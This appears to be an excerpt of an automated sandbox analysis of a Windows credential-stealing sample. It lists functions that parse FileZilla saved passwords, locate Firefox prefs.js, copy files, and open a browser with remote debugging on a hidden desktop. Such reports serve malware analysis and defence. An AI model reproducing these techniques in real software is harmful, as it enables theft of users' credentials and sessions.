                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: b7272a25136b95c8b89d5fc5249b6b215e29e50a56b2179b35c6cc1d91713aa7
                                • Instruction ID: 0078beb7c5f1765df916d9aa7574ca5b2d16b7d7f9e4eae4b1db03bfb4ba6ecb
                                • Opcode Fuzzy Hash: b7272a25136b95c8b89d5fc5249b6b215e29e50a56b2179b35c6cc1d91713aa7
                                • Instruction Fuzzy Hash: D9527C71A112169BCB61FFA9DC49BAEB7BAFF05300F094129F909A7251DB34ED018F94
                                Function 006B6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6B9D
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6BCD
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6BFD
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 006B6C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006B6C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 006B6C5A
                                • lstrlen.KERNEL32(00000000), ref: 006B6C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 006B6CE2
                                • lstrlen.KERNEL32(00000000), ref: 006B6CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 006B6D6A
                                • lstrlen.KERNEL32(00000000), ref: 006B6D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006B6DF2
                                • lstrlen.KERNEL32(00000000), ref: 006B6E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006B6E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006B6EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 006B6EC9
                                • LocalFree.KERNEL32(00000000), ref: 006B6ED4
                                • lstrlen.KERNEL32(?), ref: 006B6F6E
                                • lstrlen.KERNEL32(?), ref: 006B6F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: e414ddfc7dce22a201676580e8c5e5e6e219c541037a639f66c469e5af589bea
                                • Instruction ID: 8f60a80d686d789a4a0f619e8c00017a87b01ea143ec597acba95a6bae591f2b
                                • Opcode Fuzzy Hash: e414ddfc7dce22a201676580e8c5e5e6e219c541037a639f66c469e5af589bea
                                • Instruction Fuzzy Hash: BC02AFB0A51212ABCB10BBB9DC59AEE7BBBBF05700F040559F946E7251DB38DC418BA0
                                Function 006B4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B4B7F
                                • lstrlen.KERNEL32(006D4CA8), ref: 006B4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4BA7
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006B4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B4BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: 484540a502a741099c32d8bab1cf1d49caa0742fc6077f071fca140692d3b385
                                • Instruction ID: d3d8a1f4567b9c114ae9ce3ec76c1b4cf0375dbee43293cd4265ff4f3bd98bc7
                                • Opcode Fuzzy Hash: 484540a502a741099c32d8bab1cf1d49caa0742fc6077f071fca140692d3b385
                                • Instruction Fuzzy Hash: EC9252B0A026118FDB24DF29C944BE9B7E6BF45714F1981ADE44A9B362DB35DC82CF40
                                Function 006B1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B12BF
                                • lstrlen.KERNEL32(006D4CA8), ref: 006B12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B12E7
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006B12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B133A
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006B135C
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006B1376
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B13E2
                                • lstrlen.KERNEL32(006D1794), ref: 006B13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B140A
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1416
                                • lstrlen.KERNEL32(?), ref: 006B1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1443
                                • lstrcat.KERNEL32(00000000,?), ref: 006B1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B147A
                                • StrCmpCA.SHLWAPI(?,0133D828), ref: 006B14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1535
                                • StrCmpCA.SHLWAPI(?,0133DBC0), ref: 006B1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B15E4
                                • StrCmpCA.SHLWAPI(?,0133D798), ref: 006B1602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1633
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1685
                                • StrCmpCA.SHLWAPI(?,0133D678), ref: 006B16B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B16F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1745
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006B181C
                                • FindClose.KERNEL32(00000000), ref: 006B182B
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 018c5b6d728160a3838a2a1f906a37bd0997ccecba6e63b3086e8f0e64db61f2
                                • Instruction ID: 0b10941879d7a8d4c3d992c42bf35848cbcc890b745f8abb9f252ee08eb9f150
                                • Opcode Fuzzy Hash: 018c5b6d728160a3838a2a1f906a37bd0997ccecba6e63b3086e8f0e64db61f2
                                • Instruction Fuzzy Hash: FF1283B1A11216ABCB20EF79D869AEF77B6BF45300F44452DF84A97250EB34DC418B90
                                Function 006BCBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 006BCBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 006BCC13
                                • lstrcat.KERNEL32(?,?), ref: 006BCC5F
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006BCC71
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006BCC8B
                                • wsprintfA.USER32 ref: 006BCCB0
                                • PathMatchSpecA.SHLWAPI(?,01339368), ref: 006BCCE2
                                • CoInitialize.OLE32(00000000), ref: 006BCCEE
                                  • Part of subcall function 006BCAE0: CoCreateInstance.COMBASE(006CB110,00000000,00000001,006CB100,?), ref: 006BCB06
                                  • Part of subcall function 006BCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006BCB46
                                  • Part of subcall function 006BCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 006BCBC9
                                • CoUninitialize.COMBASE ref: 006BCD09
                                • lstrcat.KERNEL32(?,?), ref: 006BCD2E
                                • lstrlen.KERNEL32(?), ref: 006BCD3B
                                • StrCmpCA.SHLWAPI(?,006CCFEC), ref: 006BCD55
                                • wsprintfA.USER32 ref: 006BCD7D
                                • wsprintfA.USER32 ref: 006BCD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 006BCDB0
                                • wsprintfA.USER32 ref: 006BCDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006BCDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 006BCE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 006BCE28
                                • CloseHandle.KERNEL32(00000000), ref: 006BCE33
                                • CloseHandle.KERNEL32(00000000), ref: 006BCE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006BCE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BCE94
                                • FindNextFileA.KERNEL32(?,?), ref: 006BCF8D
                                • FindClose.KERNEL32(?), ref: 006BCF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: ca55a7ed672859678d5ba3834c86410f320ae1198a9ea83874f83af870e483d8
                                • Instruction ID: cce91899b20548e076f872884ed07d5138df165f18238b9afae82d71c9c2fec5
                                • Opcode Fuzzy Hash: ca55a7ed672859678d5ba3834c86410f320ae1198a9ea83874f83af870e483d8
                                • Instruction Fuzzy Hash: 6DC14FB1A11219ABDB60EF64DC45EEE777ABF84310F044599F509A7290EE30AF85CF50
                                Function 006B1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B12BF
                                • lstrlen.KERNEL32(006D4CA8), ref: 006B12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B12E7
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006B12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B133A
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006B135C
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006B1376
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B13E2
                                • lstrlen.KERNEL32(006D1794), ref: 006B13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B140A
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1416
                                • lstrlen.KERNEL32(?), ref: 006B1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1443
                                • lstrcat.KERNEL32(00000000,?), ref: 006B1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B147A
                                • StrCmpCA.SHLWAPI(?,0133D828), ref: 006B14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1535
                                • StrCmpCA.SHLWAPI(?,0133DBC0), ref: 006B1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B15E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006B181C
                                • FindClose.KERNEL32(00000000), ref: 006B182B
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 5bf62aba578027278d7678fe373d9ddaccd5ab63818cd62ab9f738ac373e346d
                                • Instruction ID: 9f62889e22ace49fcdde0558d9b443860308ac71ae66757e510e8496b047b11c
                                • Opcode Fuzzy Hash: 5bf62aba578027278d7678fe373d9ddaccd5ab63818cd62ab9f738ac373e346d
                                • Instruction Fuzzy Hash: 35C191B1A11216ABCB21FF69DC69AEF77B6BF02300F44012DF84997651EB34DD418B90
                                Function 006A9770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 006A9790
                                • lstrcat.KERNEL32(?,?), ref: 006A97A0
                                • lstrcat.KERNEL32(?,?), ref: 006A97B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 006A97C3
                                • memset.MSVCRT ref: 006A97D7
                                  • Part of subcall function 006C3E70: lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C3EA5
                                  • Part of subcall function 006C3E70: lstrcpy.KERNEL32(00000000,0133E748), ref: 006C3ECF
                                  • Part of subcall function 006C3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,006A134E,?,0000001A), ref: 006C3ED9
                                • wsprintfA.USER32 ref: 006A9806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 006A9827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 006A9844
                                  • Part of subcall function 006C46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006C46B9
                                  • Part of subcall function 006C46A0: Process32First.KERNEL32(00000000,00000128), ref: 006C46C9
                                  • Part of subcall function 006C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006C46DB
                                  • Part of subcall function 006C46A0: StrCmpCA.SHLWAPI(?,?), ref: 006C46ED
                                  • Part of subcall function 006C46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C4702
                                  • Part of subcall function 006C46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 006C4711
                                  • Part of subcall function 006C46A0: CloseHandle.KERNEL32(00000000), ref: 006C4718
                                  • Part of subcall function 006C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006C4726
                                  • Part of subcall function 006C46A0: CloseHandle.KERNEL32(00000000), ref: 006C4731
                                • lstrcat.KERNEL32(00000000,?), ref: 006A9878
                                • lstrcat.KERNEL32(00000000,?), ref: 006A9889
                                • lstrcat.KERNEL32(00000000,006D4B60), ref: 006A989B
                                • memset.MSVCRT ref: 006A98AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006A98D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A9903
                                • StrStrA.SHLWAPI(00000000,0133EDD0), ref: 006A9919
                                • lstrcpyn.KERNEL32(008D93D0,00000000,00000000), ref: 006A9938
                                • lstrlen.KERNEL32(?), ref: 006A994B
                                • wsprintfA.USER32 ref: 006A995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 006A9971
                                • Sleep.KERNEL32(00001388), ref: 006A99E7
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                  • Part of subcall function 006A92B0: strlen.MSVCRT ref: 006A92E1
                                  • Part of subcall function 006A92B0: strlen.MSVCRT ref: 006A92FA
                                  • Part of subcall function 006A92B0: strlen.MSVCRT ref: 006A9399
                                  • Part of subcall function 006A92B0: strlen.MSVCRT ref: 006A93E6
                                  • Part of subcall function 006C4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006C4759
                                  • Part of subcall function 006C4740: Process32First.KERNEL32(00000000,00000128), ref: 006C4769
                                  • Part of subcall function 006C4740: Process32Next.KERNEL32(00000000,00000128), ref: 006C477B
                                  • Part of subcall function 006C4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C479C
                                  • Part of subcall function 006C4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 006C47AB
                                  • Part of subcall function 006C4740: CloseHandle.KERNEL32(00000000), ref: 006C47B2
                                  • Part of subcall function 006C4740: Process32Next.KERNEL32(00000000,00000128), ref: 006C47C0
                                  • Part of subcall function 006C4740: CloseHandle.KERNEL32(00000000), ref: 006C47CB
                                • CloseDesktop.USER32(?), ref: 006A9A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
